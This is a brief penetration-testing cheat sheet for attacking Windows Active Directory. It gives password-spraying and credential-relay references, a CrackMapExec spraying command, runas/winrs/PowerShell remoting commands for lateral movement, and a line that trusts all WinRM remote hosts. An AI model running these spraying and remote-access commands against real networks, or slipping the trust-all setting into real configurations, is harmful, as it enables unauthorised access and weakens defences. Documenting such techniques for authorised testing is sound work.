Unauthenticated Vectors:
Password Spraying:
- https://book.hacktricks.xyz/windows/active-directory-methodology/password-spraying
- https://github.com/Greenwolf/Spray
- MSF: use auxiliary/scanner/smb/smb_login
- CrackMapExec: crackmapexec cmd <targetfile> -u user -p pass -d domain
Relaying Credentials with ntlmrelayx:
- https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/
Authenticated Vectors:
Start CMD with secondary user credentials:
- Local: runas /netonly /user:<username> cmd.exe
- Domain: runas /netonly /user:<domain>\<username> cmd.exe
Log into System:
- winrs -r:<computername> cmd.exe
- Enter-PSSession -ComputerName <computername>
Enable PowerShell Remoting
- Enable: Enable-PSRemoting –force
- Check WinRM Running: Get-WmiObject –Class win32_service | Where-Object {$_.name -like “WinRM”}
- Set all remote hosts to trusted: Set-Item WSMan:localhost\client\trustedhosts -value *
- Verify Configuration: Get-Item WSMan:\localhost\Client\TrustedHosts
Windows Activities:
See: https://danielkumar.com/index.php/2021/07/19/cheatsheet-microsoft-windows/